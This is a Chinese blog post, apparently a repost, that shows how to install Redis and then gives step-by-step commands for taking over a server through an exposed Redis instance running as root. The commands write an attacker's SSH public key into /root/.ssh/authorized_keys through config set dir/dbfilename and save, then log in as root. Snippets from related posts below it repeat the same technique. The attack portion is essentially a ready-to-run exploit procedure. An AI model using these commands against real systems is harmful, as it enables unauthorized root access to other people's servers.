redis与ssh-keygen

最新推荐文章于 2024-08-09 16:24:01 发布
最新推荐文章于 2024-08-09 16:24:01 发布
阅读量72 收藏
点赞数
文章标签: 运维 数据库
原文链接:https://yq.aliyun.com/articles/654410
版权

在ubuntu上安装是非常方便的,两个命令就行了。

$sudo apt-get update

$sudo apt-get install redis-server

若是redis-cli命令出现redis 127.0.0.1:6379>,则安装成功了


如何根据Redis和ssh入侵入侵服务器。原理上并不复杂,只是利用的规则有点苛刻:

1. redis要暴露在公网上

2. 嗯ssh进程也得开

3. Redis要是以root的权限启动的。(这个命令就是以root权限启动的(端口随便填):redis-server --port 6369)


先在本地建个ssh的秘钥

ssh-keygen -t rsa

cd ~/.ssh/

然后将公钥写入文本中(文本还可以有路径,比如说/tmp/1.txt)

前后空两行,公钥的内容就不会跟redis的内容混在一起了

(echo -e "\n\n";cat ~/.ssh/id_rsa.pub;echo -e "\n\n")>1.txt

然后把里面的内容设置到远程的redis服务器上,设置key为233

cat 1.txt | redis-cli -h xxx.xxx.x.xx -p 6379  -x set 233

远程连接一下

redis-cli -h xxx.xxx.x.xx

修改保存的路径

xxx.xxx.x.xx :6379> config set dir /root/.ssh/

xxx.xxx.x.xx :6379> config get dir

修改保存的名称

xxx.xxx.x.xx :6379> config set dbfilename "authorized_keys"

保存

xxx.xxx.x.xx :6379> save

SAVE 命令执行一个同步保存操作,将当前 Redis 实例的所有数据快照(snapshot)以 RDB 文件的形式保存到硬盘。

远程利用自己的私钥登录该服务器。

ssh -i id_rsa root@xxx.xxx.x.xx

weixin_34112181
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Redis-desktop redis管理工具 支持SSH 无bug版
12-12
Redis-desktop redis管理工具 支持SSH,SSL,Advanced sessting 无bug版
关于ssh2的配置
03-21
2. **生成密钥对**:使用`ssh-keygen`命令生成公钥和私钥,通常将公钥放在服务器的`~/.ssh/authorized_keys`文件中,私钥保留在本地客户端。 3. **配置SSH服务器**:编辑`/etc/ssh/sshd_config`文件,设置端口、...
redis+ssh-keygen免认证登录案例
weixin_34023863的博客
03-21 159
2019独角兽企业重金招聘Python工程师标准>>> ...
Redis-密钥登录ssh,免密码
weixin_54227009的博客
06-06 1867
1、在kali上生成密钥命令:ssh-keygen -t rsa因为我这里有了,所以y选择了覆盖如果是想无密码登录的话,则直接enter跳过2、 因为我这里config set dir /root/.sshdir有问题,所以我直接就把生成的密钥放目标靶机的/root/.ssh/authorized_key文件下了原操作应该是:(echo -e "\n\n"; cat id_rsa.pub;echo -e "\n\n")>key.txt防止乱码,将公钥写入key.txt中将key.txt导入进目标机器cat
Redis未授权访问配合SSH key的综合利用
hyy615545936的博客
09-11 1550
【实验原理】 利用 Redis 自身的提供的config命令,可以进行写文件操作,恶意访问者可以成功将自己的公钥写入目标服务器的/root/.ssh文件夹的authotrized_keys文件中,进而可以直接使用对应的私钥登录目标服务器。 步骤一:在本地生产公私钥文件 linux系统行使用命令ssh-keygen -t rsa生成本地公钥和私钥文件,输入密码口令;如下其显示成功生成公...
SSH关闭远程密码登录---Window&Linux客户端证书登录&window找不到ssh-keygen
2401_83947105的博客
04-28 800
解决办法:如果你搞懂了一点ssh免密码登录的流程,你就会知道点原理,使用其他操作来达到scp-copy-id的效果,反正最终实现的结果都是一样的,管他是走着到的还是开车到的。-rw-r–r-- 1 root root 392 6月 20 10:53 id_rsa.pub。-rw------- 1 root root 1671 6月 20 10:53 id_rsa。2、在工作中,运维人员经常需要跟运营人员打交道,请问运营人员是做什么工作的?7、Tomcat和Resin有什么区别,工作中你怎么选择?
【 Linux学习】SSH连接时出现Host key verification failed的原因及解决方法以及ssh-keygen命令的用法_host key verification failed
2301_79058150的博客
05-06 809
比如 ~/.ssh/known_hosts文件中有一条 172.28.3.55 的配置。现在我们执行命令我们再查看下 ~/.ssh/known_hosts文件的内容,如下所示:删除完配置之后,重新执行命令,输入命令然后输入密码即可。如果想以后都不输入密码直接执行命令的话,则需要参考链接 https://blog.csdn.net/ouyang_peng/article/details/77334215 然后重新配置ssh秘钥,然后再执行命令。
Linux配置ssh免密_ssh-keygen是只针对root用户 ,2024年最新赶紧收藏起来
m0_62261166的博客
04-18 408
ncayu@192.168.70.160 ~]$ ssh-keygen -t rsa #指定加密算法为rsa。也可以在/etc/sudoers文件最后面加上,这样的写法,使用sodo权限不需要密码验证。ncayu账号密码为ncayu123456。
关于Redis未授权访问漏洞利用的介绍与修复建议
09-09
生成公钥和私钥的命令是`ssh-keygen`,公钥通常存储在`~/.ssh/id_rsa.pub`,私钥存储在`~/.ssh/id_rsa`。通过`ssh-copy-id`命令,可以将公钥复制到远程主机的`~/.ssh/authorized_keys`文件,实现无密码登录。 **...
SSH2中配置Redis缓存
11-06
Redis是基于内存,也可以基于磁盘持久化nosql数据库Redis 官网推荐给java 使用的客户端很多:Jedis、Redisson、JRedis、JDBC-Redis 等,当然首推是jedis。
E044-服务漏洞利用及加固-利用redis未授权访问漏洞进行提权.pdf
12-02
6. **生成SSH密钥对**:使用`ssh-keygen`命令生成RSA类型的SSH密钥对。默认情况下,私钥保存在`~/.ssh/id_rsa`,公钥保存在`~/.ssh/id_rsa.pub`。攻击者只需将公钥内容写入Redis,然后在目标服务器上创建或修改`~/....
tools:有用的方法
03-27
ssh-keygen -t rsa 在所有问题上按Enter键。 这将在C:\ Users \ YOUR_USERNAME \ .ssh中创建一个名为id_rsa和id_rsa.pub的公用密钥和专用密钥。 将SSH公钥添加到服务器 登录到您的服务器确保〜/ .ssh / authorized...
research-obras-devtools:这是为了改善Obras开发流程,开发实用程序以及对Foreman,Docker和编辑器VsCode和Rubymine的支持
04-02
Roberto Nogueira BSd EE, MSd CE Solution Integrator Experienced - Certified by Ericsson 研究Obras DevTools 关于 这是为了改善Obras开发流程,开发实用程序以及对 , 和编辑器和。...$ ssh-keygen -o -f ~ /.s
SSH项目集成redis(缓存示例)
weixin_44605704的博客
07-22 4328
SSH项目集成redis
Linux磁盘管理与文件系统(一):磁盘、MBR与分区和文件系统
shyuu的博客
08-08 996
Linux磁盘管理与文件结构(一),理论讲解磁盘结构、MBR与分区和文件系统
Falsk测试与部署(第九阶段)
蜡笔小新星的博客
08-09 627
在本章节中,我们学习了如何使用unittest和pytest进行单元和集成测试,以及如何配置Flask应用,使用WSGI服务器部署,容器化Flask应用并将其部署到各种云服务平台。通过这些步骤,你可以确保你的Flask应用在生产环境中的稳定性和可靠性。希望这些知识能够帮助你在实际项目中更好地实现测试和部署。
Centos7.6配置阿里云镜像源
ZHOUY@H
08-09 141
1、备份本地镜像源,将/etc/yum.repos.d/下所有文件备份到/etc/yum.repos.d/bak/下。3、清除yum缓存-yum clean all。4、验证镜像源仓库 yum repolist。
zabbix的自动发现和注册、proxy代理和SNMP监控
最新发布
Alone8046的博客
08-09 306
二、zabbix通过代理服务器添加主机:分布式监控,代理服务器的作用就是分担 server 的集中式压力;先有服务器,再有模版,模版当中设置应用集,模版当中设置应用集,再应用集中配置监控项,在监控项之后配置触发器,最后配置图形(可选项)zabbix proxy(代理服务器):代理服务器也要安装数据库,保存客户端的数据,然后再发送给服务端(代收器)zabbix客户端主动的和服务端联系,将自己的地址和端口发送给服务端,实现自动添加监控主机。snmp:简单网络管理协议,用来监控网络设备,可以监控交换机和路由器。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值